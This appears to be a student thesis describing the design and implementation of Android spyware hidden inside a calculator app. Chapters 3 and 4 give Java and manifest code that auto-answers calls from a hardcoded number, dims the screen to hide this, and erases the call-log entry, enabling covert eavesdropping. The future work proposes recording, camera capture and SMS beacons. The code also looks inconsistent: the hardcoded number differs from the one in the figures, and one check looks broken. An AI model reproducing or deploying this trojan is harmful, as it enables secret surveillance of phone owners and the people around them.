ii

ABSTRACT

Android is the most widely used mobile platform, and unfortunately, it is widely

targeted mobile platform (for hacking and attacks) as well. The framework concentrates

on developing an app with malicious behaviour which helps us in understanding the

functionality of any malicious app. The intent of the malicious activity is to

automatically answer calls from specific phone number. Once the malicious application

is installed, a call can be made to the infected device for eavesdropping on the

conversation taking place around the infected device. This helps in understanding the

functionality of telephony manager. The framework implements a calculator

application as a carrier of the malicious app. In the front end it will be a normal

calculator application, but in the back end it performs malicious activity of answering

calls and listening to conversations taking place around the infected device. Testing and

evaluation of the project suggest that a normal user cannot differentiate between a

malicious application and a normal application.

iii

TABLE OF CONTENTS

Abstract………………………………………………………………………………ii

Table of Contents……………………………………………………………………iii

List of Figures………………………………………………………………………..v

List of Tables……………………………………………………...………………..vii

1. Background and Rationale………………………………………………………..1

1.1 Permissions…………………….…………………………………………1

1.2 Two Layered Permission…...…...………………………………………..1

1.3 Permissions and Package………...………………...……………………..2

1.4 Permissions and API Calls………..………………………………...……2

1.5 Clustering Technique……………...………………………………….......3

1.6 Literature Review.…………………..…………………………...……….3

1.6.1 Implementing an app to extract information using vulnerabilities..3

1.6.2 Malicious program Android.Anzhu…...…………………………..6

1.6.3 Malicious code insertion……………..……………………............7

1.7 Limitations………………………………………………………………..8

2. Narrative……………………………………………………………………….....9

2.1 Problem Statement………………………………………………………..9

2.2 Motivation…………………………………………………………….......9

2.3 Project Goal………………………………………………………………9

2.4 Objectives of the Project………………………………………………...10

3. System Design…………………………………………………………………..11

3.1 Flow of the Project………………………………………………………12

iv

3.2 Steps in the Project Development……………………………………….14

3.2.1 Developing calculator application………………………………...14

3.2.2 Answering the call………………………………………………...15

3.2.3 Disconnecting the call……………………………………………..16

3.2.4 Deleting call log…………………………………………………...17

3.3 Environment…………………………………………………………….17

3.3.1 Android Studio………………………………………………….17

4. Implementation of the Application Modules……………………………………19

4.1 Implementation of Calculator Application……………………………...19

4.2 Setting Permissions in AndroidManifest.xml File...…………………….21

4.3 Performing Malicious Activity........…………………………………….21

5. Testing and Evaluation……………...…………………………………………..27

5.1 Launching the Calculator Application..…………………………………27

5.2 Input Validation for Calculator App……………………………………28

5.3 Answering the Call……….……………………………………………..30

5.4 Disconnect Ongoing Call.……………………………………………….32

5.5 Delete Call Log…..…..………………………………………………….34

6. Conclusion and Future Work………………………………….………………...37

7. Bibliography and References……………………………………………………39

v

LIST OF FIGURES

Figure 1.1: Alteration of server database using a malicious client app [6]…………....5

Figure 1.2: Screen Off and Lock and additional icon configure Screen Off and Lock (in

red circles) [7]………………………………………………………………………….7

Figure 1.3: Insertion of malicious file in .apk archive [7]…………………………….8

Figure 3.1: Calculator app…………………………………………………………….11

Figure 3.2: Flow of the project……………………...………………………………...13

Figure 3.3: Performing illegal division operation ……………..……………………...15

Figure 4.1: Code snippet for layout of the calculator application ……………..…….20

Figure 4.2: Code snippet for functionality of calculator application …………….…..21

Figure 4.3: Code snippet for setting up permissions in AndroidManifest.xml file……21

Figure 4.4: Code snippet for answering the call - checking part………………………22

Figure 4.5: Code snippet for answering the call - answering part……………………..24

Figure 4.6: Code snippet for disconnecting the call when power button is pressed….25

Figure 4.7: Code snippet for deleting the call details from call log ……………..…....26

Figure 5.1: Launching the application………………………………………………...27

Figure 5.2: Addition operation………………………………………………………..28

Figure 5.3: Input validation of default value……………………………………….…29

Figure 5.4: Input validation of error message for division operation……………….…29

Figure 5.5: Dialing the number corresponding to a device with malicious code …..….30

vi

Figure 5.6: Infected device: Automatically answering the call from 361-695-4276...31

Figure 5.7: Call in progress after it is automatically answered by the infected device

……………………………………………………………………………………..…31

Figure 5.8: Incoming call when number is not malicious…………………………......32

Figure 5.9: Caller’s device: Disconnect the call when power button is pressed on the

infected side ………………………………………………………………………….33

Figure 5.10: Infected device: Disconnect the call when power button is pressed……..34

Figure 5.11: Call log after disconnecting malicious call. ………………………….....35

Figure 5.12: Call log after disconnecting normal call…………………………….......36

vii

LIST OF TABLES

Table 1.1: Success or failure of the malicious app as per protection levels of permissions

…………………………………………………………………………………………6

1

1. BACKGROUND AND RATIONALE

Android is the most widely used mobile platform and unfortunately it is widely

targeted mobile platform (for hacking and attacks) as well. One easy way of getting

access to an android device is by using permissions when installing an app. If the

unsuspecting user gives access to all the permissions asked for, then the malicious

application may take advantage of it. After the malicious application is installed, it will

seek different permissions to send SMS to a premium number or make a call to a

premium number which may lead to a financial loss. Malicious app can steal

information by accessing phone storage, address book, user name and password. Not

only permissions but some researchers use API calls, source code, and packages as well.

Following sections list few examples where researchers have used permissions, source

code, packages, and API calls to develop a framework.

1.1 Permissions

Many researchers accessed permissions (which is specified in

AndroidManifest.xml file) to develop a framework to detect malware in Android. Some

researchers have developed a malware detection framework based on permissions [1].

Principal Component Analysis algorithm was used for selecting the features extracted

from the permissions and then Support Vector Machine method is applied to classify

whether the data collected is benign or malicious [1].

1.2 Two Layered Permission

Some researchers proposed android malware detection scheme which used two

layered permission. Rather than just using permissions, permissions as well as

permission pairs were used to detect malicious application. For each android

2

application, permissions requested are retrieved from the corresponding application

package file. The permissions are identified by analysing the application dex file

(Dalvik executable file), and the features are used to detect malware [2].

1.3 Permissions and Package

Researchers used permissions as well as packages to design a static android

malware detection model. For each application, feature vector was formed using the

information on permissions and packages. Then an application is passed onto a

classifier to classify it. AndroidManifest.xml file which provides all the information

about an application to the android system is read and the permission feature is

extracted from it. The extracted permission feature is compared with the permission set

obtained beforehand to classify an application. Similarly, other tools were used to

decompile class.dex files (Dalvik executable file which holds information about the

resources and manifest file) into source code. Then source code was read to extract

package feature and then extracted package feature was compared with the package set

obtained beforehand to classify an application [3].

1.4 Permissions and API Calls

Android malware static detection framework was designed using a feature set

that contains permissions and API calls. Features of permissions and API calls are

extracted separately from an application file. As done in most of other frameworks

discussed, permissions are extracted from the AndroidManifest.xml file present in

application package file. AXMLPrinter2 tool [4] is used to decompile xml file. The label

<uses-permission> contains information about the permissions [4].

3

1.5 Clustering Technique

Clustering technique was applied to detect a malware in android application.

Machine learning technique was used in auto detection of malware application.

Business and tools was concentration of this application. A widely used machine

learning algorithm known as K-means algorithm was used to apply the clustering

technique. All the android applications are collected and then one application is

extracted from it. Then android manifest file is processed to extract data from it. An

Attribute-Relation File Format (ARFF) file is created from the extracted features. At

last the K-means algorithm is applied to the application [5].

1.6 Literature Review

Most of the researchers concentrated on detecting the malicious app rather than

developing it. However to have a better understanding of a malicious app we need to

understand how a malicious app works and what are the vulnerabilities it can exploit.

This section discusses some of the malicious apps developed by the researchers.

1.6.1 Implementing an app to extract information using vulnerabilities

This malicious application uses ContentProvider and AddressBook database

which alters AddressBook to extract the information. The steps involved in

implementing and executing the malicious app are:

Implementing and executing a server app.

Analysing the server app.

Implementing and executing the malicious client app.

The steps involved in implementing and executing the server app are [6]:

4

1. Database named AddressBook.db is defined which holds names, phone numbers

and addresses.

2. Activities are written to retrieve, insert, delete and modify the database.

3. ContentProvider is written to receive external queries for retrieving, inserting,

deleting and modifying the database and to reflect accordingly.

4. The URI for ContentProvider is assigned in AndroidManifest.xml.

5. A range of permissions and protectionLevels for ContentProvider is applied.

6. Developer’s private key is used as the signature attached and a compressed

execution file, Server.apk is generated.

7. Server.apk file is installed on a smartphone and run to generate the content of

the AddressBook [6].

The steps involved in analysing the server app are [6]:

1. ApkManager is used to extract the URI and permission information from

AndroidManifest.xml of Server.apk file.

2. ApkManager and Dedexer are used to extract database field names and

attributes of the ContentProvider from classes.dex [6].

The steps involved in implementing and executing the malicious client app are [6]:

1. ContentResolver is written to retrieve, insert, delete and modify the content of

the database using the extracted database URI, field names and attributes of the

database.

2. The extracted URI is specified in AndroidManifest.xml.

3. The same permission as the extracted one is used to the <uses-permission>.

4. The attacker’s private key is used as the signature. A compressed execution file,

Theif.apk is generated.

5

5. Theif.apk file is installed on the smartphone and run to access the content of

AddressBook.db [6].

Figure 1.1 displays the results of altering the server database [6] in which

permissions are not assigned to ContentProviders of the server app. Figure 1.1 (a)

displays the result of generating and viewing an AddressBook in the server app. Figure

1.1 (b) displays the results of client app performing insertion, deletion and modification

operations. Figure 1.1 (c) displays the content of database through the server app after

the malicious app updated the database [6].

Figure 1.1: Alteration of server database using a malicious client app [6]

Researchers were able to access some permissions and some permissions were

not accessible. Table 1.1 summarizes the success or failure of the malicious application

discussed as per protection levels of permissions.

6

Table 1.1: Success or failure of the malicious app as per protection levels of

permissions [6]

1.6.2 Malicious program Android.Anzhu

The malicious application Android.Anzhu controls the smartphone by changing

the configuration of bookmarks. To enable unhindered access of a smartphone,

Android.Anzhu is installed as a backdoor. Android.Anzhu application is built into an

application well-known for locking the screen and turning the smartphone off with one

touch without using the power button - the Screen Off and Lock [7]. Once this

7

application is installed it will install additional icon “Configure Screen Off and Lock”

as shown in figure 1.2.

Figure 1.2: Screen Off and Lock and additional icon configure Screen Off and

Lock (in red circles) [7]

1.6.3 Malicious code insertion

Most common and easiest way to insert the bug or to manipulate the code is, to

modify the source code. However the source code is not available that often. If the

source code is not available then the bug can be embedded into the applications .apk

file. The .apk file is an ordinary zip-archive with executable code, manifest, digital

8

signature, and resource files [7]. As shown in figure 1.3 new classes.dex file with

modified date of 26.08.2013 18:27 is inserted into existing .apk file.

Figure 1.3: Insertion of malicious file in .apk archive [7]

1.7 Limitations

Most of the researchers concentrated on permissions. However, APIs can be

exploited by attackers as well.

API calls can be classified into five types. They are privacy related API calls,

network related API calls, SMS related API calls, Wi-Fi related API calls, and

components related API calls [9]. However, the contribution of these API calls is not

investigated to detect malware. Most of the researchers as discussed in this paper

concentrates on one or two types of API calls.

More information about API calls can be extracted from applications, and this

information can be used in developing an android malware detection framework.

Most of the researchers extract information related to permissions from

AndroidManifest.xml file. However, AndroidManifest.xml file contains other

information besides permissions which can be used for detecting vulnerabilities as well.

9

2. NARRATIVE

2.1 Problem Statement

Android is most widely used mobile platform and unfortunately it is widely

targeted mobile platform (for hacking and attacks) as well. It might so happen that

android app marketplace may host some of the malicious applications which could

evade detection before being downloaded by unsuspecting devices. To develop

antimalware or to protect the device from being affected, it is important to understand

the functioning of malicious application. To do so, it is important to understand how a

malicious application can access unwanted permissions and how a malicious

application can affect the user (financial loss, data loss, etc).

2.2 Motivation

As of 2014, over one billion smartphones shipped were powered by android.

Among the mobile devices running android operating system, more than 50% of them

had unpatched vulnerabilities. As per Forbes report published in March 2014, 97% of

mobile malware were on devices using android operating system. An application can

perform any operation, so allowing an application to be installed without even knowing

in advance the operations performed by an application may lead to malware getting

infected. This malware application can lead to information or financial loss.

2.3 Project Goal

The main goal of the developed system is to understand the functioning of

malicious apps and to understand how a malicious application accesses telephony

methods to answer the call automatically and listen to the conversation taking place

10

around the infected device. Most of the malicious applications use permissions or API

calls related to android telephony framework to incur financial losses or to access

sensitive information. In the developed system, malicious code is embedded in normal

application. When the unsuspecting user installs this application, malicious code is

executed as well, which accesses telephony methods to answer the call automatically,

thereby allowing hackers to listen to the conversation taking place around the infected

device.

2.4 Objectives of the Project

The main objectives of the project are:

1) To embed the malicious code into normal application.

2) To answer the call automatically.

3) To disconnect the call when power button is pressed.

4) To delete history when malicious call is disconnected.

5) To understand the vulnerability of android telephony framework.

11

3. SYSTEM DESIGN

In order to embed the malicious code, a normal application which in this case is

a simple calculator app is developed as shown in figure 3.1. The malicious code is then

embedded within the calculator app. To answer a call, user permissions are defined and

a receiver is created which accepts broadcast events. One of the instances of hidden

class of android telephony framework is accessed, which controls useful methods of

call state. The call is answered automatically if and only if it is received from one

particular number, that number is defined and compared with the incoming call number.

If both match the call is accepted automatically, otherwise the app will behave

normally. When the user clicks the power button the call is automatically disconnected

and the call log for the number is deleted accordingly.

Figure 3.1: Calculator app

12

3.1 Flow of the Project

Figure 3.2 depicts the flow of the project. As soon as the calculator application

is installed, malicious code takes over the infected device. After that, whenever the

infected target receives an incoming call it checks for the malicious number. If the

incoming number is malicious, then it accepts the call automatically, that way the rogue

caller can listen to the conversation taking place around the infected device. If the

incoming number is not malicious, then the phone behaves normally waiting for the

user to take action. While listening to the conversation, if the infected devices user

presses the power button, the call will be disconnected automatically. After the call is

disconnected automatically or the rogue caller ends the call from his end, the entry of

malicious number is deleted from the call log.

13

Figure 3.2: Flow of the project

14

3.2 Steps in the Project Development

3.2.1 Developing calculator application

To develop a malicious application a normal calculator application is

developed. Then the malicious code is integrated into the code of the calculator app.

The calculator application designed can perform addition, subtraction, multiplication

and division operations.

As shown in figure 3.3, any operation can be performed by entering the first

number and second number, and then pressing the appropriate operation button. When

‘+’ button is pressed addition operation is performed, when ‘-’ button is pressed

subtraction operation is performed, when ‘*’ button is pressed multiplication operation

is performed, and when ‘/’ button is pressed division operation is performed. To

perform a floating point operation we need to pull additional classes which may

increase the functionality since the concentration is on designing the malicious

application rather than calculator application, operations are restricted to integer

operations. While performing the division operation if denominator is 0 then “Cannot

Divide” message is displayed as shown in figure 3.3.

15

Figure 3.3: Performing illegal division operation

3.2.2 Answering the call

After the calculator app is installed on a device, the malicious code integrated

within the app will automatically answer the call coming from a specific rogue caller.

In this way the caller can listen to the conversation taking place around the infected

device. When a person makes a call to a device on which this malicious application is

installed, the incoming phone number is checked with the number specified in the code,

if the number matches then the call is answered automatically otherwise the application

will behave normally. If developed application does not behave normally for other

incoming numbers then someone may report the malicious activity to the infected

16

device user. That’s why it is important that the application behaves normally when the

incoming number is not malicious.

As soon as a phone call is received by a device, TELEPHONY_SERVICE

method is invoked. This service is used to check the status of a call. If call is idle, then

"No call available to be answered" message is displayed. If call is not idle then

EXTRA_KEY_EVENT is used to check the event triggering the service class. In this

case, ANDROID_PERMISSION_CALL_PRIVILEGED event is triggered. If

ANDROID_PERMISSION_CALL_PRIVILEGED event triggers the service class,

then broadcast receiver is called. The broadcast receiver will receive the service and

will check the state of a call. If the state of a call is ringing (CALL_STATE_RINGING)

then it will retrieve the incoming phone number using

EXTRA_INCOMING_NUMBER intent. If the incoming number matches with the

number specified in the code then the call is answered automatically. After the call is

answered brightness of the screen is reduced so that infected device user doesn’t notice

the malicious activity.

3.2.3 Disconnecting the call

While listening to the conversation if the infected device user presses power

button then the call should be disconnected immediately. However, this should take

place only if the call is answered automatically i.e., the call is answered maliciously.

To do so the state of a screen should be checked. If it is on, then the call answered can

be a regular call and the call is not disconnected. However, if the screen is off, and the

call answered is malicious then the call is disconnected automatically.

17

3.2.4 Deleting call log

Since the infected device user should not be aware of the malicious activity, the

number should be deleted from the call log. However, we should delete an entry which

corresponds to the malicious number. When the call is disconnected, the number is

compared to malicious number, if they match then corresponding entry for the

malicious number in the call log is deleted, otherwise the application doesn’t do

anything. To delete a call from the call log the entire URI where call log is stored is

retrieved. After retrieving the call log URI, total entries in call log is calculated. If total

count is zero then "Call log is empty" message is displayed. If there are some entries in

the call log then malicious number’s entry is retrieved so that it can be deleted from the

call log. If malicious number’s entry is not found then "Number not found in call log"

message is displayed otherwise "Number deleted from call log" message is displayed.

3.3 Environment

The designed system is implemented in Java. JDK 1.6 or higher is needed to

develop this project. Android Studio is the programming environment used, for

programming convenience. The project is tested on smartphone having android version

4.2.1.

3.3.1 Android Studio

Android Studio is JetBrain’s IntelliJ IDEA based software designed for Android

development. “Android Studio offers:

Flexible Gradle-based build system.

Build variants and multiple apk file generation.

Code templates to help you build common app features.

18

Rich layout editor with support for drag and drop theme editing.

Lint tools to catch performance, usability, version compatibility, and other

problems.

ProGuard and app-signing capabilities.

Built-in support for Google Cloud Platform, making it easy to integrate Google

Cloud Messaging and App Engine” [10].

19

4. IMPLEMENTATION OF THE APPLICATION MODULES

The malicious app is developed for android using Android Studio. First the

calculator app is designed and then malicious code is integrated into it. The rest of the

chapter includes the implementation details.

4.1 Implementation of Calculator Application

The GUI for calculator app is programmed in activity_main.xml file. Figure 4.1

shows part of the code snippet for layout of the calculator application.

<LinearLayout

android:orientation="horizontal"

android:layout_width="match_parent"

android:layout_height="wrap_content"

android:layout_alignParentLeft="true"

android:layout_alignParentStart="true"

android:layout_below="@+id/etSecondNumber"

android:id="@+id/linearLayout">

<Button

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:text="+"

android:id="@+id/btnAdd" />

<Button

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:text="-"

android:id="@+id/btnSub" />

<Button

android:layout_width="wrap_content"

android:layout_height="wrap_content"

android:text="/"

android:id="@+id/btnDiv" />

<Button

android:layout_width="wrap_content"

20

android:layout_height="wrap_content"

android:text="*"

android:id="@+id/btnMul" />

</LinearLayout>

Figure 4.1: Code snippet for layout of the calculator application

The functionality of the calculator app is written in MainActivity.java file.

Figure 4.2 shows the code snippet for the main activity of the calculator application.

public void onClick(View view) {

String num1 = etFirst.getText().toString();

String num2 = etSecond.getText().toString();

int firstInteger=0,secondInteger=0;

try {

firstInteger = Integer.parseInt(num1);

secondInteger = Integer.parseInt(num2);

}catch (Exception e) {

tvResult.setText("Please enter first and second

numbers");

}

switch (view.getId()) {

case R.id.btnAdd:

int add = firstInteger + secondInteger;

tvResult.setText(String.valueOf(add));

break;

case R.id.btnSub:

int sub = firstInteger - secondInteger;

tvResult.setText(String.valueOf(sub));

break;

case R.id.btnMul:

int mul = firstInteger * secondInteger;

tvResult.setText(String.valueOf(mul));

break;

case R.id.btnDiv:

try {

int div = firstInteger / secondInteger;

tvResult.setText(String.valueOf(div));

} catch (Exception e) {

21

tvResult.setText("Cannot Divide");

}

break;

}

}

Figure 4.2: Code snippet for functionality of calculator application

4.2 Setting Permissions in AndroidManifest.xml File

Every application has an AndroidManifest.xml file in its root directory. The

manifest file presents essential information about the application to the Android system.

This information is essential for the system to run any of the application’s code. All

permissions used in the app are set in the manifest file. Figure 4.3 shows the permissions

used while implementing the framework.

<uses-permission

android:name="android.permission.READ_PHONE_STATE" />

<uses-permission

android:name="android.permission.PROCESS_OUTGOING_CALLS"

/>

<uses-permission

android:name="android.permission.CALL_PHONE" />

<uses-permission

android:name="android.permission.READ_CONTACTS" />

<uses-permission

android:name="android.permission.WRITE_CONTACTS" />

<uses-permission

android:name="android.permission.READ_CALL_LOG" />

<uses-permission

android:name="android.permission.WRITE_CALL_LOG" />

Figure 4.3: Code snippet for setting up permissions in AndroidManifest.xml file

4.3 Performing Malicious Activity

The malicious code is embedded into the calculator application’s code for

performing the malicious activity of listening to the conversation taking place around

the infected device. Then the first step is to automatically answer the incoming call

22

received from the malicious number. Figures 4.4 and 4.5 show the code snippet for call

answering part.

private void answerPhoneHeadsethook() {

Log.d(Keys.LOGTAG, "answerPhoneHeadsethook()");

int nCallState = -1;

TelephonyManager tm = (TelephonyManager)

getSystemService(Context.TELEPHONY_SERVICE);

if ( (nCallState = tm.getCallState()) ==

TelephonyManager.CALL_STATE_IDLE) {

Log.d(Keys.LOGTAG, "No call available to be

answered.");

return;

}

Log.d(Keys.LOGTAG, "Call can be answered: " +

nCallState);

// Simulate a press of the headset button to pick up

the call

Intent buttonDown = new

Intent(Intent.ACTION_MEDIA_BUTTON);

buttonDown.putExtra(Intent.EXTRA_KEY_EVENT, new

KeyEvent(KeyEvent.ACTION_DOWN,

KeyEvent.KEYCODE_HEADSETHOOK));

sendOrderedBroadcast(buttonDown,

ANDROID_PERMISSION_CALL_PRIVILEGED);

// froyo and beyond trigger on buttonUp instead of

buttonDown

Intent buttonUp = new

Intent(Intent.ACTION_MEDIA_BUTTON);

buttonUp.putExtra(Intent.EXTRA_KEY_EVENT, new

KeyEvent(KeyEvent.ACTION_UP,

KeyEvent.KEYCODE_HEADSETHOOK));

sendOrderedBroadcast(buttonUp,

ANDROID_PERMISSION_CALL_PRIVILEGED);

}

Figure 4.4: Code snippet for answering the call - checking part

23

public void onReceive(final Context context, Intent

intent) {

// Check phone

int callState = 0;

TelephonyManager tm = null;

String strInNumber = "";

Activity myActivityReference = null;

try{

tm = (TelephonyManager)

context.getSystemService(Context.TELEPHONY_SERVICE);

callState = tm.getCallState();

if(callState == TelephonyManager.CALL_STATE_RINGING

&&

intent.hasExtra(TelephonyManager.EXTRA_INCOMING_NUMBER)){

PowerBtnCalc.SHOULD_DISCONNECT_CALL = false;

Intent intAnswerCall = new Intent(context,

ServiceAnswer.class);

intAnswerCall.putExtra(ServiceAnswer.OPERATION,

ServiceAnswer.ACTION_ANSWER);

strInNumber =

intent.getStringExtra(TelephonyManager.EXTRA_INCOMING_NUM

BER);

Log.d(Keys.LOGTAG, "NUMBER: " + strInNumber);

// the phone number can be in various

formats, some times there's a + at the start some times

its not. I am trying to handle all cases.

// a call is automatically answered only if

its from the malicious person's number

if((strInNumber.endsWith("3613430183") ||

strInNumber.equals("13613430183") ||

strInNumber.equals("+13613430183")) &&

intent.getAction().equals(Intent.ACTION_SCREEN_OFF)) {

PowerBtnCalc.SHOULD_DISCONNECT_CALL =

true;

context.startService(intAnswerCall);

WindowManager.LayoutParams params =

myActivityReference.getWindow().getAttributes();

24

myActivityReference.getWindow().addFlags(WindowManager.La

youtParams.FLAG_KEEP_SCREEN_ON);

myActivityReference.getWindow().addFlags(WindowManager.La

youtParams.FLAG_DISMISS_KEYGUARD);

myActivityReference.getWindow().addFlags(WindowManager.La

youtParams.FLAG_TURN_SCREEN_ON);

params.screenBrightness = 0.0f;

myActivityReference.getWindow().setAttributes(params);

}

}

}catch(Exception excp){

excp.printStackTrace();

}

}

Figure 4.5: Code snippet for answering the call - answering part

While listening to the conversation if user presses the power button then the call

is disconnected automatically, if it is answered maliciously. Figure 4.6 shows the code

snippet for disconnecting the call.

public void onReceive(final Context context, Intent

intent) {

try {

Log.d(Keys.LOGTAG, "Phone is locked.");

if

(intent.getAction().equals(Intent.ACTION_SCREEN_OFF)) {

screenOff = true;

Log.i(Keys.LOGTAG, "via Receiver Normal Screen

OFF " + SHOULD_DISCONNECT_CALL );

if (SHOULD_DISCONNECT_CALL) {

DISCONNECT_CALL = true;

}

} else if

(intent.getAction().equals(Intent.ACTION_SCREEN_ON)) {

25

screenOff = false;

Log.i(Keys.LOGTAG, "via Receiver Normal Screen

ON" );

if (DISCONNECT_CALL) {

DISCONNECT_CALL = false;

SHOULD_DISCONNECT_CALL = false;

Intent intDCCall = new Intent(context,

ServiceAnswer.class);

intDCCall.putExtra(ServiceAnswer.OPERATION,

ServiceAnswer.ACTION_DISCONNECT);

context.startService(intDCCall);

}

} else

if(intent.getAction().equals(Intent.ACTION_ANSWER)) {

Log.i(Keys.LOGTAG, "via Receiver Normal ANSWER"

);

}

}catch(Exception ex){

Log.e(Keys.LOGTAG, ex.toString());

}

}

Figure 4.6: Code snippet for disconnecting the call when power button is pressed

If the incoming call is answered maliciously then the infected device user should

not see the call information in the call log. That’s why this number is deleted from the

call log. Figure 4.7 shows the code snippet for deleting the calls details from the call

log.

String historyUri = "content://call_log/calls";

Uri callsUri = Uri.parse(historyUri);

Cursor cur = this.getContentResolver().query(callsUri,

null, null, null, null);

if (cur.getCount() <= 0) {

Log.d(Keys.LOGTAG, "Call log is empty");

return;

}

while (cur.moveToNext()) {

String queryString = "NUMBER='" + deleteNumber + "'";

26

Log.d("Number", queryString);

int i = this.getContentResolver().delete(callsUri,

queryString, null);

if (i >= 1) {

Log.d(Keys.LOGTAG, "Number deleted from call

log");

} else {

Log.d(Keys.LOGTAG, "Number not found in call

log");

}

}

Figure 4.7: Code snippet for deleting the call details from call log

27

5. TESTING AND EVALUATION

This section deals with the functional evaluation of the application. The

application is tested by installing the application on BLU LIFE PURE mobile phone

with android version 4.2.1. The application supports all Android versions upto 4.4. In

order to install the application, the “install from other locations” setting, under the

developer options of the phone should be enabled. The later sections of the chapter

deals with various test cases.

5.1 Launching the Calculator Application

When the application is launched, the calculator app is seen on the screen. The

malicious activity is not seen or noticed. Figure 5.1 shows the calculator application.

Figure 5.1: Launching the application

28

Once the calculator application is launched basic addition, subtraction,

multiplication and division operations can be performed. Figure 5.2 shows the result of

an addition operation.

Figure 5.2: Addition operation

5.2 Input Validation for Calculator App

When the user does not enter the first and second numbers then the default value

(zero) is displayed as shown in figure 5.3. If user enters the second number as zero then

“Cannot Divide” message is displayed as shown in figure 5.4.

29

Figure 5.3: Input validation of default value

Figure 5.4: Input validation of error message for division operation

30

5.3 Answering the Call

Once calculator app is installed, the hidden malicious activity of the application

starts monitoring the incoming phone calls. If incoming number is malicious, then

application automatically answers the call. Figure 5.5 shows the caller making a call to

the infected device. Figure 5.6 shows behaviour of the infected device, which answers

the call automatically, if incoming number is malicious. Figure 5.7 shows the call in

progress on the caller side.

Figure 5.5: Dialing the number corresponding to a device with malicious code

31

Figure 5.6: Infected device: Automatically answering the call from 361-695-4276

Figure 5.7: Call in progress after it is automatically answered by the infected

device

32

If the incoming number is not malicious then the call should not be answered

automatically. Figure 5.8 depicts the behaviour of the infected device, which behaves

normally when a call is made from a normal number.

Figure 5.8: Incoming call when number is not malicious

5.4 Disconnect Ongoing Call

While listening to the conversation, if the user presses the power button then the

ongoing call should be disconnected automatically or the caller can hang up call to

disconnect the call. Figure 5.9 depicts the behaviour of the caller’s phone when a call

is disconnected by pressing the power button on the infected side. Figure 5.10 depicts

33

the behaviour of an infected device when a call is disconnected by pressing the power

button.

Figure 5.9: Caller’s device: Disconnect the call when power button is pressed

on the infected side

34

Figure 5.10: Infected device: Disconnect the call when power button is pressed

5.5 Deleting Call Log

After disconnecting the call, the call log should be checked, if a number found

in the call log is malicious then the corresponding number’s entry is deleted from the

call log as shown in figure 5.11. This is evident from figure 5.6 as there was a call

received from a number “361-695-4276” which is not seen in the call log of figure 5.11.

If the number found in the call log is not malicious then the corresponding number’s

entry is not deleted from the call log as shown in figure 5.12. This is evident from figure

5.8 as there was a call received from a number “571-345-5627” which can be seen in

figure 5.12.

35

Figure 5.11: Call log after disconnecting malicious call

36

Figure 5.12: Call log after disconnecting normal call

37

6. CONCLUSION AND FUTURE WORK

Android is the most popular operating system. As of 2014, over one billion

smartphones shipped were powered by android. Android is currently developed by

Google. Billions of applications are published on Google Play and unfortunately, none

of these applications are tested before being published, which leads a way to rogue

developers to publish malicious applications. The developed application is a malicious

application which being a calculator app performs malicious activity. After the

calculator application is installed onto the target device, a rogue caller can easily listen

to the conversation taking place around the infected device by making a call to the

device infected with malicious code. Once the target receives the call from a malicious

number it will automatically answer the call. While listening to the conversation if the

infected device user presses the power button then the call is automatically

disconnected there by not allowing the user to see the malicious activity taking place.

The entry for the malicious number is deleted from the call log.

Future Work

The application can be improved with regards to following aspects:

Disabling the screen as soon as the call is connected automatically. As of now,

it takes some time for the screen to turn off.

Not only listening to the conversation, but also recording the conversation

taking place between the infected device and malicious number.

A rogue developer can develop an application which will allow them to call

target device with just a click and then record the conversation.

Conversation can be recorded at the target end as well.

38

Ability to send an SMS to the rogue developer with the phone number of an

infected device.

Activating the camera on the phone to automatically transmit pictures and

video.

Not only call and camera, we can use other modes to steal the information.

Current project supports android version up to 4.4, it can be extended further to

implement the logic on latest devices with android version 5.0 and higher.

The application can be extended to iOS as well.

39

BIBLIOGRAPHY AND REFERENCES

[1] Zhao Xiaoyan; Fang Juan; Wang Xiujuan; 2014; “Android malware detection based

on permissions”; 2014 International Conference on Information and Communications

Technologies (ICT 2014).

[2] Xing Liu, Jiqiang Liu; 2014; “A Two-layered Permission-based Android Malware

Detection Scheme”; 2014 2nd IEEE International Conference on Mobile Cloud

Computing, Services, and Engineering.

[3] Xiangyu-ju; 2014; “Android Malware Detection through Permission and

Package”; Proceedings of the 2014 International Conference on Wavelet Analysis and

Pattern Recognition, Lanzhou; 13-16 July, 2014.

[4] Patrick P. K. Chan, Wen-kai Song; 2014; “Static Detection of Android Malware by

using Permissions and API calls”; Proceedings of the 2014 International Conference

on Machine Learning and Cybernetics, Lanzhou; 13-16 July, 2014.

[5] Aiman A. Abu Samra, Kangbin Yim, Osama A. Ghanem; 2013; “Analysis of

Clustering Technique in Android Malware Detection”; 2013 Seventh International

Conference on Innovative Mobile and Internet Services in Ubiquitous Computing.

[6] Taenam Cho, Jae-Hyeong Kim, Hyeok-Ju Cho, Seung-Hyun Seo, Seungjoo Kim;

2013; “Vulnerabilities of Android Data Sharing and Malicious Application to Leaking

Private Information”; 2013 Fifth International Conference on Ubiquitous and Future

Networks (ICUFN).

[7] Android. Anzhu – new backdoor for Android devices (2015, August 6). Retrieved

from http://news.drweb.com/?i=2256&c=5&lng=en&p=0.

40

[8] Mikhaylov D, Zhukov I, Starikovskiy A, Kharkov S, Tolstaya A, Zuykov A; 2013;

“Review of malicious mobile applications, phone bugs and other cyber threats to mobile

devices”; 2013 5th IEEE International Conference on Broadband Network &

Multimedia Technology (IC-BNMT); 17-19 Nov. 2013.

[9] Chan, P.P.K; Wen-Kai Song; 2014; “Static detection of Android malware by using

permissions and API calls”; 2014 International Conference on Machine Learning and

Cybernetics (ICMLC).

[10] Android Studio Overview (2015, August 6). Retrieved from

http://developer.android.com/tools/studio/index.html.